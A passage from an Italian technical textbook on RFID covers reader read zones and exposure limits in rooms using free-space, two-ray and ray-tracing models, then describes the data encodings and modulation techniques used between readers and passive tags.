Nel caso di polarizzazione circolare (Av=1, Ah=±j), la massima diretti-vità e la larghezza di fascio a 3dB variano rispetto al parametro geometri-co L seguendo la legge espressa dal modello (29) e mostrata in FiguraIII.42. Nella stessa figura è riportato un fitting polinomiale delle suddet-te grandezze

(30)

che può essere utilizzato per stimare la lunghezza L e riprodurre il vet-tore radiazione allorquando il guadagno o la larghezza di fascio dell’an-tenna sono noti.

PARTE III - ACCOPPIAMENTO, ENERGIA & ANTENNE NEI TAG PASSIVI193

Figura III.42Direttività e larghezza di fascio del modello

dell’antenna del reader al variare delparametro geometrico L. Le curve

tratteggiate rappresentano il fittingpolinomiale (30).

2-ParteIIIsilver.qxp:RFID 5-09-2008 15:57 Pagina 193

Page 187: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

CASI DI STUDIO

I modelli proposti sono applicati ad alcuni ambieni di riferimento costi-tuiti sia da stanze vuote che arredate ma anche in presenza di persone. Lezone di lettura precedentemente definite sono valutate per diversi valoriverosimili della potenza emessa dall’antenna del Reader e della sensibilitàefficace del TAG: EIRP=0,5; 3,2W, e =10, 50 100 µW. Per esem-pio, =10 µW potrebbe rappesentare un tag molto sensibile (pC=10µW) posto sopra un oggetto privo di perdite, mentre =100 µWpotrebbe descrivere sia un TAG poco sensibile (pC=100 µW) posto su unoggetto privo di perdite che un TAG con la stessa sensibilità del caso pre-cedente ma posto su un oggetto con forti perdite. In tutti gli esempi trattati l’antenna del reader irradia alla frequenza di

870MHz e si suppone avere una larghezza di fascio BW=67° e un guada-gno Gmax=9.2dB. Usando il diagramma di Figura III.42, si stima la lun-ghezza del parametro L=15.6cm. L’analisi numerica che segue basata sulla tecnica del ray tracing viene

usata per discutere l’accuratezza dei modelli in spazio libero e a due raggifornendo utili informazioni per il posizionamento e il valore della poten-za da fornire al Reader.

5.2.1 Stanze vuote

Si prendono in considerazione due stanze didimesione 5.5m x 3m x 3m (ufficio) e 5.5m x 6mx 3m (laboratorio o negozio) con l’antenna delReader posta nel centro di una parete ad unmetro dal pavimento. Le corrispondenti zone di lettura calcolate

con il tre modelli sono mostrate in Figura III.43(ufficio), e Figura III.44 in (laboratorio). In que-sta situazione, se si adottasse il caso peggiore diinterrogazione continua (d=1), si creerebberozone proibite in cui il campo elettrico supera illimite E0=6V/m r.m.s..Si osserva che la frontiera di ΩF può essere

RFID - Fondamenti di una tecnologia silenziosamente pervasiva194

III.5.2

Tabella III.2Massima dimensione della regione proibita

stimata con il modello in spazio libero.

2-ParteIIIsilver.qxp:RFID 5-09-2008 15:57 Pagina 194

Page 188: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

predetta con buona accuratezza con la formuladi spazio libero, la quale è appropriata anche nelcaso di duty cycles d<1 e per livelli di esposizio-ne più alti, per esempio E0=20 V/m o

, come fissato dalle racco-mandazioni europee [119]. La regione proibitadipende evidentemente dall’EIRP trasmesso epuò estendersi, difronte al Reader, anche perdistanze superiori al metro. In Tabella III.2. sonoriportati i valori della massima estensione dellaregione proibita rF, calcolati con la formula di

spazio libero, per diverse combinazioni della potenza emessa, del duty-cycle, e del massimo valore di campo ammissibile. Solo le distanze mag-giori di λ/2 sono mostrate. Per E0≥20V/m rF è sempre inferiore a 50cm epotrebbe essere ulteriormente ridotta per duty-cycles d<1. Per esempio,assumendo Tcom=30ms (EPCglobal Class 1 Generation 2 UHF, cfr.§IX.4.1.1), dieci interrogazioni al secondo (T0=0,1s) si ha un duty cycled=0,3 e di conseguenza la distanza proibita si dimezza rispetto al caso diinterrogazione continua.

L’interazione del campo elettromagnetico con lepareti della stanza produce frange di interferenzache generalmente riducono l’estensione dellaregione di lettura rispetto alla stima fatta con ilmodello in spazio libero. Nel caso di forti intera-zioni con le pareti il modello in spazio libero sovra-stima anche di 1m la regione utile di lettura rispet-to alla predizione con il ray tracing. PoichèD=5,5m, il modello in spazio libero diventa inade-guato in quanto 2,75m<rFS<5,5m, difatti lo scatte-ring (riflessione) dalla parete di fronte all’antennadel Reader produce frange di interferenza tali darendere critico il link tra il Reader ed il TAG.

Il modello a due raggi invece, applicato con Γ=0,5, esibisce un buonaccordo con il risultato predetto dal ray tracing e permette di individuare

PARTE III - ACCOPPIAMENTO, ENERGIA & ANTENNE NEI TAG PASSIVI195

Figura III.43Tagli sul piano orizzontale (ad 1m dal

pavimento) della regione di lettura utile nelcaso di una stanza delle dimensioni di un

ufficio (5.5m x 3m x 3m). Il reader posto in (x,y, z) = (0, 1.5, 1)m si assume in interrogazione

continua (d=1). Le immagini ombreggiateindicanola regione ΩU calcolata con il ray

tracing. L’ellisse più piccolo delimita laregione proibita ΩF(E0=6V/m) stimata con il

modello in spazio libero. Le altre ellissidelimotano ΩR calcolata con il modello inspazio libero (linea tratteggiata) e con il

modello a due raggi (linea continua).

Figura III.44Come in Fig. III. 43 ma nel caso di una stanza(laboratorio) con dimensioni (5.5m x 6 x 3m).

2-ParteIIIsilver.qxp:RFID 5-09-2008 15:57 Pagina 195

Page 189: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

la minima regione uniforme di lettura. Per rFS<D/2=2,75m il modello adue raggi e quello in spazio libero concordano bene mentre perrFS>D=5,5m il modello a due raggi sottostima la regione di lettura. Lapredizione in spazio libero, invece, è in questo caso in buon accordo conil risultato del ray tracing. Vale la pena evidenziare che il modello a due raggi tiene conto solo

della riflessione della parete posta di fronte all’antenna del reader e nondi quelle provenienti dalle pareti laterali le quali influenzano il livello dipotenza nella stanza alquanto marginalmente. Di conseguenza, ellissoidisimili possono rappresentare, con ragionevole accuratezza, la regione dilettura di stanze di grandezza diversa (come in Figura III.43 e in FiguraIII.44) ma con stessa distanza tra il Reader e la parete di fronte.

5.2.1 Stanze arredate ed in presenza di persone

La stanza presa in considerazione è il laboratorio di antennedell’Università di Roma Tor Vergata, essa è mostrata nella foto di Figura

III.45. Il modello matematico del ray tracinginclude gli oggetti di arredamento (tavoli, arma-di, scaffali metallici) ma anche dettagli architetto-nici come porte e finestre. Le gambe dei tavolisono modellate con tubi metallici mentre le per-sone (in posizione seduta) sono modellate conparallelepipedi dielettrici di dimesione50x30x130cm aventi i parametri dielettrici delmuscolo. L’insieme dei parametri dielettrici uti-lizzati per tale modello sono riportati in TabellaIII.3. Il Reader è posto ad 1m dal pavimentomentre difronte ad esso, alla distanza D=5,5m, sitrova un armadio metallico.

Il primo insieme di risultati (Figura III.46)riguarda il caso di assenza di persone, quindi lefrange di interferenza sono prodotte dall’arma-dio metallico posto di fronte al Reader e in misu-ra inferiore dagli altri oggetti dell’arredamento.

RFID - Fondamenti di una tecnologia silenziosamente pervasiva196

Figura III.45Foto e modello geometrico di un tipico

ambiente di laboratorio con studenti sedutinella postazione di lavoro (box ombreggiati).

2-ParteIIIsilver.qxp:RFID 5-09-2008 15:57 Pagina 196

Page 190: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

Come nel caso della stanza vuota di Figura III.44, il modello in spaziolibero non predice adeguatamente la regione di lettura sovrastimandola diben 2m (difatti è il caso di 2,7m<rFS<5,5m). Il modelo a due raggi inveceriesce a conservare una previsione adeguata anche in ambienti complicaticome questo. Il diagramma in Figura III.47 mostra il campo elettrico calcolato per

Pin=3,2W EIRP e nel caso di presenza di persone. L’effetto di assorbi-mento ed ombreggiamento prodotto dal corpoumano è chiaramente visibile e modifica apprez-zabilmente l’estensione della regione di lettura.

PARTE III - ACCOPPIAMENTO, ENERGIA & ANTENNE NEI TAG PASSIVI197

Tabella III.3parametri elttromagnetici del laboratorio alla

frequenza di 870MHz

Figura III.46Regione di lettura sul piano orizzontale ad1m dal pavimento per la stansa laboratoriocon l’arredamento ma senza persone. Laspiegazione delle ellissi è la stessa di quelladi Figura III.43.

Figura III.47Campo elettrico (valore r.m.s.) predetto dalmodello di ray tracing nella stanzalaboratorio in presenza di persone per unaemissione del reader di 3.2W EIRP

2-ParteIIIsilver.qxp:RFID 5-09-2008 15:57 Pagina 197

Page 191: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

Mentre l’estensione della regione proibita(riferita a E0=6 V/m) conserva la stessa formapassando da una stanza vuota ad una piena e conpersone la regione ΩU cambia presentando dellelacune in prossimità della posizione delle perso-ne. Tale cambiamento è maggiormente evidentequanto più il rapporto è alto, inoltrené il modello in spazio libero né quello a dueraggi sono capaci di tener conto della presenzadelle persone. Tuttavia il modello a due raggimantiene una accuratezza comparabile a quelladella stanza vuota se si esclude le lacune dovutealla presenza delle persone. Si osserva che ponendo l’antenna del Reader

sul soffitto della stanza anziché sulle pareti si riesce a mitigare sia l’effettodell’arredamento che di quello delle persone (Figura III.49). La regioneutile di lettura è in questo caso molto più estesa di quella nel caso di posi-zionamento a parete inoltre poichè l’altezza del soffitto è D=3m il model-lo in spazio libero risulta adeguato nel predire la regione di lettura comesi può vedere in Figura III.50 essendo rFS=6,13m<D. D’altra parte si èosservato anche che con tale configurazione basta solo 1W EIRP peravere una regione di lettura utile estesa quasi l’intera stanza usando unasingola antenna per il Reader.

RFID - Fondamenti di una tecnologia silenziosamente pervasiva198

Figura III.48Regione di lettura sul piano orizzontale ad1m dal pavimento per la stanza laboratorioin presenza di arredamento e di persone. Laspiegazione delle ellissi è la stessa di quella

di Figura III.43

Figura III.49Campo elettrico (valore r.m.s.) predetto dal

modello di ray tracing nella stanzalaboratorio in presenza di persone quandol’antenna del reader è posta al centro del

soffitto ed emette 1.0W EIRP.

Figura III.50Regione di lettura sul piano orizzontale (ad 1m dal pavimento)e su un taglio verticale per la stanza laboratorio in presenza diarredamento e di persone con l’antenna del reader posta sulsoffitto ed 1W EIRP. La linea tratteggiata indica la regione dilettura prevista dal modello in spazio libero.

2-ParteIIIsilver.qxp:RFID 5-09-2008 15:57 Pagina 198

Page 192: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

CONCLUSIONI

In questi capitoli è stata presentata una formulazione di sistema per lapiattaforma Reader-TAG che stima la regione utile di lettura tenendoconto dei principali parametri del link RFID. In dettaglio il modello in spazio libero risulta non essere adeguato per

alcune configurazioni dei paramentri in presenza di oggetti altamentescatteranti. Tuttavia esso fornisce una approssimazione valida quandol’interazione Reader-TAG avviene su breve distanza in una porzione pic-cola della stanza, lontano dagli oggetti, per esempio quando il Readeremette bassa potenza o il TAG ha bassa sensibilità. Il modello a due raggi, invece, è ragionevolmente adeguato nelle con-

dizione in cui il modello in spazio libero fallisce la predizione, pertanto lacombinazione di entrambi i modelli secondo le direttive sopra discusse,potrebbe fornire un valido strumento per una rapida e semplice pianifica-zione del sistema.Situazioni maggiormente complicate in cui la presenza di diversi osta-

coli impediscono la linea di vista della comunicazione Reader-TAGdovrebbero essere affrontate usando un accurato strumento di calcolobasato sul ray tracing e con un adeguato modello della sorgente delcampo elttromagnetico che può essere modellata ricorrendo al modelloparametrico d’antenna sopra introdotto.

PARTE III - ACCOPPIAMENTO, ENERGIA & ANTENNE NEI TAG PASSIVI199

III.5.2

2-ParteIIIsilver.qxp:RFID 5-09-2008 15:57 Pagina 199

Page 193: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFIDFondamenti di una tecnologia silenziosamente pervasiva

PARTE IV

CODIFICHE E MODULAZIONINEI SISTEMI RFID

di Paolo Talone, Giuseppe Russo

Fondazione Ugo Bordoni

Si tratta di una parte dedicata ad approfondimenti tecnologici, che presupponeconoscenze di base nelle tecnologie impiegate per la trasmissione radio.Vengono pertanto illustrati alcuni aspetti tecnici della radiocomunicazione tra TAGe Reader: Codifica dei dati, ovvero il modo di generare un segnale binario a partire dai

dati che il dispositivo (TAG o Reader) ha in memoria. Vengono trattate anchetecniche che sfruttano la codifica per ottenere trasferimento di potenza o parti-colari effetti nelle modulazioni del segnale radio.

Tecniche di modulazione del segnali radio, con particolare riguardo a sistemirivolti a TAG passivi che richiedono accortezze particolari. Vengono anche forniticenni sulla struttura dei ricevitori.

Tecniche di interrogazione del Reader e tecniche di risposta dei TAG (Protocollianti collisione). Vengono anche trattati metodi di sincronizzazione tra interroga-zioni e risposte, specie nei casi in cui molti TAG e diversi Reader condividono lamedesima distanza operativa.

2-parteIV.qxp:rfid 5-09-2008 10:57 Pagina 201

Page 194: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

PARTE IV - CODIFICHE E MODULAZIONI NEI SISTEMI RFID203

CODIFICA DEI DATI

Nel TAG e nel Reader, i dati da trasmettere devono essere codificati inmodo da generare un segnale unipolare binario che verrà usato per lamodulazione. Esistono numerosissime tecniche di codifica, ognuna concaratteristiche differenti relativamente all’occupazione spettrale in bandabase, alla complessità di co-decodifica, alla difficoltà di ricostruire la tem-porizzazione in ricezione, alla sensibilità ai disturbi (che determinanoerrori di trasmissione) e all’energia trasferita. Questi costituiscono infattii parametri chiave nella selezione delle tecniche più convenienti per l’usonei sistemi RFID.In particolare, i sistemi basati su TAG passivi impongono vincoli piut-

tosto stringenti sulla scelta della metodologia di codifica. La indisponibi-lità di sorgenti di temporizzazione ad elevata precisione a bordo del TAG,i vincoli sulla larghezza di banda e, soprattutto, la necessità di massimiz-zare il trasferimento di potenza per l’alimentazione del TAG, rendono lacodifica dei dati un’operazione critica per molte applicazioni RFID.Nella trasmissione Reader=>TAG deve essere massimizzata l’energia

nel segnale, per fornire la maggior energia possibile al TAG.Nella trasmissione TAG=>Reader deve essere minimizzata l’energia

nel segnale, per la scarsità di energia disponibile. D’altro canto l’ampiez-za del segnale deve essere tale da consentirne la rilevazione da parte delReader.In genere si utilizzano codifiche basate sulla durata degli impulsi (PIE

- Pulse Interval Encoding) oppure basate sulle transizioni (Manchester,Miller, FM0).I metodi di codifica denominati Manchester (Bi-Phase-L) e Pulse

Interval Encoding (PIE) sono quelli più utilizzati nelle comunicazioni daiReader verso i TAG massimizzando l’energia del segnale.Una caratteristica importante di questi metodi di codifica è che, essen-

do basati sulle transizioni, forniscono una sequenza codificata “auto-tem-porizzata”. Tale caratteristica consente di ridurre drasticamente, nei TAGpassivi, la circuiteria necessaria per la sincronizzazione.I metodi denominati Miller ed FM0 invece risultano più idonei all’im-

piego nella comunicazione dai TAG passivi verso i Reader, minimizzando

IV.1

2-parteIV.qxp:rfid 5-09-2008 10:57 Pagina 203

Page 195: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFID - Fondamenti di una tecnologia silenziosamente pervasiva204

l’energia del segnale, soprattutto per la loro proprietà di possedere lacomponente spettrale a frequenza zero nulla.Nei metodi di codifica è definita la durata temporale minima dell’im-

pulso. Tale intervallo temporale è denominato TARI (ISO/IEC 18000-6Type A Reference Interval).

CODIFICA MANCHESTER

Nella codifica Manchester ogni bit viene segnalato da una transizionecome illustrato nella Figura IV.1. Proprio per tale caratteristica la codifi-ca Manchester è considerata una codifica auto-temporizzata, in quanto lastruttura del segnale codificato consente un’accurata sincronizzazione delflusso dati in ricezione.La codifica Manchester fornisce un modo semplice per codificare

sequenze binarie arbitrarie senza mai avere lunghi periodi di tempo prividi transizioni di segnale, il che permette di prevenire la perdita della sin-cronizzazione del clock, oppure errori di bit causati da derive del livellodi base del segnale ricevuto. Assicura infatti che la componente a frequen-za zero del segnale codificato sia zero.La codifica di ogni bit occupa un intervallo di tempo predefinito

Figura IV.1I sistemi RFID utilizzano una varietà di

tecniche di codifica. Caratteristichefondamentali da valutare sono la complessità

di sincronizzazione e l’intensità dellacomponente a frequenza zero [7]

IV.1.1

2-parteIV.qxp:rfid 5-09-2008 10:57 Pagina 204

Page 196: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

PARTE IV - CODIFICHE E MODULAZIONI NEI SISTEMI RFID205

“time slot”. Questo time slot è diviso in due metà, chiamate mezzo bit.Nella codifica Manchester uno zero è codificato con una assenza di

modulazione nel primo mezzo bit ed una modulazione nel secondo mezzobit. Viceversa un bit uno è codificato con una modulazione nel primomezzo bit ed una non modulazione nel secondo mezzo bit.

CODIFICA PIE

La codifica di tipo PIE (Pulse Interval Encoding) è basata su un TARI(cfr.§IV.1) predefinito. I bit zero ed uno così come simboli speciali qualiStart Of Frame (SOF) ed End Of Frame (EOF) sono composti da unnumero differente di periodi TARI. Conseguentemente, a parità delnumero di simboli da codificare, la lunghezza della sequenza codificatarisulta variabile, tuttavia questa caratteristica risulta di scarsa importanzapoiché la sequenza codificata risulta auto-temporizzata. Il valore TARIrappresenta anche l’ampiezza d’impulso minima presente nel segnale

modulato, fattore importante per determinare lalarghezza di banda del segnale trasmesso. In par-ticolare, più basso è il valore TARI, più elevatasarà l’occupazione di banda del segnale.Gli standard più recenti come ISO/IEC

18000-6, Type C consentono l’uso di differentivalori TARI (6,25, 12 & 25 µs) per soddisfare idifferenti vincoli regolamentari sull’emissionespettrale nelle diverse aree del mondo.

CODIFICHE MILLER E FM0Un’altra caratteristica fondamentale nella scelta delle codifiche più adatteall’implementazione nei TAG passivi è costituita dalla loro componentespettrale a frequenza zero. Infatti i TAG passivi modulano, tramite back-scattering, una portante ricevuta. Nel Reader il segnale è filtrato per elimi-nare la componente a frequenza zero, preservando solo le molto più debo-li componenti modulate dal TAG. Nella comunicazione TAG=>Reader

IV.1.2

Figura IV.2TARI [EPCglobal]

IV.1.3

2-parteIV.qxp:rfid 5-09-2008 10:57 Pagina 205

Page 197: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFID - Fondamenti di una tecnologia silenziosamente pervasiva206

sono richieste pertanto codifiche con una componente spettrale a frequen-za zero nulla o con energia molto bassa tale da non interferire con il segna-le ricevuto e da minimizzare l’emissione di energia da parte del TAG. Lecodifiche di tipo Miller e FM0 godono di tale proprietà.Come illustrato nella Figura IV.1, anche nel caso della codifica di Miller

la codifica di ogni bit occupa un intervallo di tempo predefinito “timeslot”. Questo time slot è diviso in due metà, chiamate mezzo bit.Un uno è codificato con una transizione da assenza di modulazione a

presenza di modulazione o viceversa tra i due mezzi bit del simbolo. Unbit zero è codificato invece continuando la presenza o l’assenza dimodulazione come nel precedente mezzo bit oppure invertendo talestato.In altri termini si può affermare che nella codifica di Miller si ha un’in-

versione di fase in banda base nel caso di due zero consecutivi.Nella codifica Miller modificata ogni transizione è rimpiazzata da un

impulso negativo con durata molto inferiore al periodo di durata del bit.Nella codifica FM0 (cfr. Figura IV.1) invece si ha un’inversione di fase

in banda base ad ogni inizio di simbolo ed inoltre la codifica del simbolozero ha un’inversione tra il primo mezzo bit ed il secondo.Lo standard ISO/IEC 18000-6 Type C perfeziona ulteriormente la

codifica di Miller offrendo differenti sub-carrier rates (Figura IV.3). Comeverrà accennato nei paragrafi dedicati alle tecniche di modulazione(cfr.§IV.2.4.1), incrementando di un fattore M (ad esempio M=2, 4, 8) ilnumero di transizioni presenti nell’ambito dell’intervallo di tempo dedi-cato alla trasmissione di un simbolo codificato si generano sottoportanti afrequenze via via più distanti dalla portante agevolando così la ricezioneda parte del Reader e conseguentemente ottimizzando il raggio di coper-tura, la velocità e l’occupazione spettrale del sistema.

TECNICHE DI MODULAZIONE DEI SISTEMI PASSIVINella comunicazione tra Reader e TAG e viceversa, vengono usate tecni-che di modulazione semplici che richiedono bassa complessità circuitalee in cui l’ampiezza, la fase o la frequenza, vengono variate in accordo con

Figura IV.3Codifica di Miller per la generazione

di sottoportanti [EPCglobal]

IV.2

2-parteIV.qxp:rfid 5-09-2008 10:57 Pagina 206

Page 198: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

PARTE IV - CODIFICHE E MODULAZIONI NEI SISTEMI RFID207

l’informazione trasportata da un segnale unipolare binario. I tre tipi dimodulazione più comuni sono:- ASK – (Amplitude Shift Keying), la ben nota modulazione d’ampiezzabinaria, il segnale modulante (binario) causa la variazione tra dueampiezze della portante. Se la minore delle due ampiezze è 0, la modu-lazione è chiamata On-Off Keying (OOK).La modulazione ASK può inoltre essere di tipo Double Side Band-Amplitude Shift Keying (DSB-ASK) oppure Single Side Band-ASK(SSB-ASK) che saranno descritte nei paragrafi seguenti.

- Phase Reversal-ASK (PR-ASK) nella quale il segnale modulante (bina-rio) causa lo spostamento di fase di 180° della portante. Simile allacosiddetta BPSK (Binary Phase Shift Keying) prevede che la rivelazio-ne avvenga sulla base dell’ampiezza del segnale ricevuto, e non dellafase, così da ottenere un segnale in banda base simile a quello ricavatoad una modulazione ASK.

- FSK – (Frequency Shift Keying), il segnale modulante (binario) causalo spostamento della portante tra due frequenze.

Figura IV.4La profondità di modulazione (modulation

depth) (o equivalentemente l’indice dimodulazione), il tempo di salita (rise time) e

il tempo di discesa (fall time) sono specificatein modo che il Reader possa alimentare

adeguatamente i TAG e leggerne i dati [7]

2-parteIV.qxp:rfid 5-09-2008 10:57 Pagina 207

Page 199: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFID - Fondamenti di una tecnologia silenziosamente pervasiva208

Un parametro di grande importanza è l’indice di modulazione, (espres-so possibilmente in percentuale) definito negli standard come (a – b)/(a +b) dove a e b sono il valore massimo e quello minimo dell’ampiezza delsegnale modulato.Sebbene la tecnologia a modulazione d’ampiezza sia ormai superata da

tecniche più moderne e più efficienti, essa presenta ancora il fondamen-tale vantaggio costituito dalla semplicità circuitale e di conseguenza laridotta potenza di alimentazione che favorisce l’implementazione neiTAG passivi. Le tecniche di modulazione più moderne invece, data lamaggiore complicazione circuitale necessaria per ottenere elevate presta-zioni non sono ancora implementabili (con poche eccezioni nelle bandedi frequenza più basse) avendo a disposizione potenze estremamentelimitate.Poiché le caratteristiche di propagazione del segnale dipendono in

maniera essenziale dalla frequenza operativa, i sistemi RFID che opera-no sulle bande LF, HF e UHF utilizzano codifiche e modulazioni diffe-renti.Inoltre dato che le condizioni operative dei Reader e dei TAG sono

molto diverse, anche nella trasmissione TAG =>Reader e Reader=>TAG vengono usate tecniche di codifica e modulazione differenti.

PRINCIPALI TECNICHE DI MODULAZIONE

Le tecniche di modulazione adoperate in ambiente RFID, devono soddi-sfare criteri di efficienza sia per l’occupazione spettrale (rapportobit/Hertz) sia per potenza necessaria alla trasmissione (rapporto segna-le/rumore). A questo si aggiunge la necessità di trasferire potenza elettri-ca al TAG in modo continuo.

2.1.1 Tecniche DSB-ASK e SSB-ASK (banda laterale doppia e banda latera-

le unica)

Le modulazioni digitali di tipo ASK sono inefficienti da un punto di vistadell’occupazione spettrale per un prefissato bitrate. Efficienze spettralidell’ordine di 0,20 bit/Hertz non sono inusuali per le tecniche a banda

IV.2.1

2-parteIV.qxp:rfid 5-09-2008 10:57 Pagina 208

Page 200: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

PARTE IV - CODIFICHE E MODULAZIONI NEI SISTEMI RFID209

laterale doppia, DSB-ASK. La modulazione DSB-ASK, infatti, è la tecni-ca meno efficiente in termini di occupazione spettrale, ma la più sempli-ce da realizzare tramite il meccanismo On – Off (On and Off Keying -OOK) della portante.Un approccio per incrementare l’efficienza spettrale è l’impiego della

tecnica banda laterale unica, SSB-ASK. Questa è particolarmente impor-tante in Europa dove le restrizioni in termini di larghezza di banda posso-no precludere l’uso della DSB-ASK.L’efficienza in termini di rapporto segnale/rumore delle tecniche DSB-

ASK e SSB-ASK dipende dal cosiddetto indice di modulazione comedefinito in §IV.2. Con un indice di modulazione pari al 100% (OOK), èpossibile verificare che il più basso valore di rapporto segnale rumorenecessario per ottenere un dato bitrate si ricava utilizzando le modulazio-ni DSB-ASK e SSB-ASK. I requisiti di rapporto segnale rumore dovreb-bero anche essere minimizzati per massimizzare la distanza operativa delTAG.Sfortunatamente, l’uso dell’indice di modulazione 100% (OOK), cor-

risponde anche al minimo di potenza elettrica trasportata sul downlinkper rifornire il TAG dell’energia necessaria al suo funzionamento. Iltempo di Off della portante, infatti, dovrebbe essere minimizzato in mododa evitare che il TAG perda l’alimentazione.Si ricorda infine che le modulazioni di tipo ASK presentano spesso vin-

coli sulla durata degli intervalli di transizione che sono legati alle caratte-ristiche del filtraggio operato per limitare in banda il segnale.

2.1.2 Tecnica PR-ASK

Una tecnica per la quale è possibile minimizzare i requisiti di rapportosegnale rumore in una banda stretta e contemporaneamente massimizza-re la potenza trasmessa al TAG è la cosiddetta PR-ASK nella quale lafase del segnale trasmesso varia di 180° ogni volta che viene inviato unsimbolo. Tale tecnica produce un segnale modulato identico a quelloprodotto dalla cosiddetta BPSK (Binary Phase Shift Keying). Nel casodella PR-ASK, tuttavia, la rivelazione avviene sulla base dell’ampiezzadel segnale ricevuto e non della fase. Come si vede nella colonna destra

2-parteIV.qxp:rfid 5-09-2008 10:57 Pagina 209

Page 201: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFID - Fondamenti di una tecnologia silenziosamente pervasiva210

IV.2.2

dalla Figura IV.5, il se gnale demodulato inampiezza a partire dal segnale PR-ASK, hacaratteristiche simili a quello demodulato da uncorrispondente segnale ASK.Si ricorda che questo è possibile perché la codi-

fica in banda base avviene generalmente sulla basedi tecniche di tipo PIE basate sulla durata dell’im-pulso oppure sulle transizioni (Miller, FM0) manon sulla sua ampiezza.Come la OOK, la tecnica PR-ASK è caratteriz-

zata da un indice di modulazione pari al 100%,tuttavia a differenza della OOK possiede la fon-damentale proprietà di minimizzare il tempo incui la portante non è trasmessa. Infatti, come letecniche PSK, la portante viene trasmessa conampiezza costante (solo la fase è variata) massi-mizzando in tal modo il trasferimento di energia.Inoltre dal segnale modulato così ottenuto èfacilmente estraibile una temporizzazione datoche il segnale passa per lo zero ad ogni simbolotrasmesso.La modulazione PR-ASK presenta caratteristi-

che di rapporto segnale rumore e spettro in fre-quenza molto più simili a quelle delle modulazio-ni PSK che a quelle della DSB-ASK, constatazio-ne che ne consiglia l’uso in applicazioni con bandastretta e con raggio di copertura più esteso.

MODULAZIONE READER =>TAG

La modulazione Reader =>TAG deve assicurare che il TAG riceva ener-gia sufficiente, che possa facilmente effettuare la rivelazione e che il segna-le del Reader rispetti le regolamentazioni sulla potenza massima e sull’am-piezza di banda.

Figura IV.5Confronto tra DSB-ASK (e SSB-ASK) e PR-ASK

[EPCglobal]

2-parteIV.qxp:rfid 5-09-2008 10:57 Pagina 210

Page 202: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

PARTE IV - CODIFICHE E MODULAZIONI NEI SISTEMI RFID211

Se lo schema di codifica e modulazione non consente al segnale di tra-sportare abbastanza energia, il TAG passivo non è in grado di funzionare.Inoltre il ricevitore del TAG deve essere semplice e deve essere in

grado di sincronizzare il segnale. Per ottenere ciò lo schema di codifica(del Reader) deve consentire (al TAG) il recupero della sincronizzazione,questo può avvenire dal bordo d’uscita dei simboli di un codice PIEoppure dalle transizioni di un codice di Manchester (cfr.§IV.1).Infine la probabilità di errore nei dati deve essere bassa, pena il falli-

mento della comunicazione.Per quanto riguarda il problema della normativa sulle emissioni a

radiofrequenza si devono considerare anche le forme d’onda ed il filtrag-gio, oltre all’ottimizzazione dello schema di codifica.Inoltre tutti i suddetti requisiti devono essere soddisfatti in sistemi a

basso costo.Sistemi LFIl Reader utilizza prevalentemente la modulazione FSK, per esempio

con variazioni tra i due valori di 125 e 134kHz per rappresentare i datibinari trasmessi al TAG.Sistemi HF e UHFIl Reader usa prevalentemente la modulazione ASK sia in modalità

DSB sia SSB oppure la PR-ASK, tutte caratterizzate dalla semplicità dirivelazione.Per esempio, lo standard ISO/IEC 18000 Type C (altrimenti noto come

EPC Gen2, Class 1), relativo a sistemi in banda UHF, prevede modulazio-ni di tipo Double Side Band-Amplitude Shift Keying (DSB-ASK), SingleSide Band-ASK (SSB-ASK) e Phase Reversal-ASK (PR-ASK).

RICEZIONE NEL TAG

A bordo della maggior parte dei TAG passivi sono realizzati ricevitorimolto semplici con l’utilizzo di una potenza di alimentazione estrema-mente bassa.Ad esempio, la semplicità ed economicità di un ricevitore ASK è garanti-

ta dalla possibilità di realizzare rivelatori non coerenti (cioè senza rivelazio-

IV.2.3

2-parteIV.qxp:rfid 5-09-2008 10:57 Pagina 211

Page 203: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFID - Fondamenti di una tecnologia silenziosamente pervasiva212

ne della fase del segnale) che estraggono l’invilup-po dell’ampiezza del segnale modulato. Un tipicocircuito di questo tipo, spesso realizzato nei TAG,è il ben noto “rivelatore ad inviluppo” rappresen-tato nella Figura IV.6.Dopo la demodulazione, i TAG passivi sono in

grado di decodificare segnali codificatiManchester (Bi-Phase-L) e Pulse Interval Encoding (PIE) maggiormenteutilizzati nelle comunicazioni dai Reader verso i TAG.Tali tecniche tuttavia presentano un duplice svantaggio: l’occupazione

di banda risulta piuttosto elevata mentre l’efficienza spettrale (bit/Hz)risulta relativamente basso.Queste due caratteristiche tendono generalmente ad essere antagoniste.Ad esempio gli enti regolatori richiedono che lo spettro emesso sia ben

confinato nell’ambito della banda assegnata. Usando la modulazioned’ampiezza (ASK) l’estensione dello spettro del segnale emesso limita for-temente il bitrate, a meno dell’impiego di codifiche più complesse.L’estensione dello spettro del segnale, infatti, dipende dal metodo di

codifica. Nella figura è riportato un confronto tra gli spettri ottenutidalle codifiche Manchester ed NRZ, anche se quest’ultima viene scarsa-mente utilizzata.Le applicazioni, dal canto loro, richiedono velocità di lettura dei TAG

Figura IV.6Rivelatore ad inviluppo

Figura IV.7Confronto tra spettri di segnali con codifiche

Manchester ed NRZ [21].

2-parteIV.qxp:rfid 5-09-2008 10:57 Pagina 212

Page 204: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

PARTE IV - CODIFICHE E MODULAZIONI NEI SISTEMI RFID213

elevate che implicano un maggior bitrate e conseguentemente una bandamaggiore.Ad esempio in un portale di lettura all’ingresso di un magazzino, si

